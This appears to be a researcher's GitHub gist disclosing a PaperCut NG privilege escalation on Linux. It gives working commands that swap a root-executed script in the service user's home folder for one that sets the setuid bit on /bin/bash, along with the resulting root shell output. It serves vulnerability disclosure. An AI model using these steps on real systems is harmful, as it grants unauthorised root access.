Skip to content

Instantly share code, notes, and snippets.

@xct

xct/info.md Secret

Last active December 4, 2023 07:46
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save xct/b2c2aef2ceb967c6b6dbaac325698af1 to your computer and use it in GitHub Desktop.
Save xct/b2c2aef2ceb967c6b6dbaac325698af1 to your computer and use it in GitHub Desktop.
Papercut Privilege Escalation

Papercut Privilege Escalation

Installation

We download the latest version 22.0.12 / Build 66453 from the website (pcng-setup-22.0.12.66454.sh) and install it as a low privileged user called "papercut" on Ubuntu 22.04. On installation we choose "su" method and provide the root password.

Exploitation

Assume we have access to this low privileged "papercut" user as an attacker, for example via ssh or another vulnerability and we can also access the web application on port 9191. We go to http://127.0.0.1:9191/app?service=page/PrintDeploy while logged in as application admin and then follow the assistant on the right side of the screen. We now end up on the "Mobility Print: Import Printers" screen. There we enter anything in the search field and press refresh servers. This will run /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key on the machine as root. As this file is in the directory of the papercut user, we can replace it with any binary or shell script we want.

To execute the attack, run the following commands as the low privileged "papercut" user:

papercut@research:~$ ls -lah /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4,0K Mai 26 13:03 .
drwx------ 3 papercut papercut 4,0K Mai 26 13:03 ..
...
-rwxr-xr-x 1 papercut papercut  493 Mai 12 08:45 server-command
...
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#

. `dirname $0`/.common

export CLASSPATH
${JRE_HOME}/bin/java \
        -Djava.io.tmpdir=${TMP_DIR} \
        -Dserver.home=${SERVER_HOME} \
        -Djava.awt.headless=true \
        -Djava.locale.providers=COMPAT,SPI \
        -Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
        -Xverify:none \
	biz.papercut.pcng.server.ServerCommand \
	"$@"

papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash

Now the script has been replaced and will set the setuid bit on bash when we hit the refresh button. Note that we can do that because the file is in our home directory and is owned by the papercut user (but executed as root).

Confirm root privileges:

papercut@research:~$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1,4M Jan  6  2022 /bin/bash
papercut@research:~$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)

Additional Vulnerabilities

Besides the example above, there also other similar issues with executing binaries in the papercut home folder as root. For example the print deploy service is running another binary as root from the low privileged users home folder:

papercut@research:~$ cat /etc/systemd/system/multi-user.target.wants/pc-print-deploy.service
[Unit]
Description=Automatically deploys printers through a server configuration
ConditionFileIsExecutable=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy

[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy



Restart=always
RestartSec=120

[Install]
WantedBy=multi-user.target

Here the binary can also be replaced similar to the above - but it requires a restart to trigger it. Other services are also affected.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment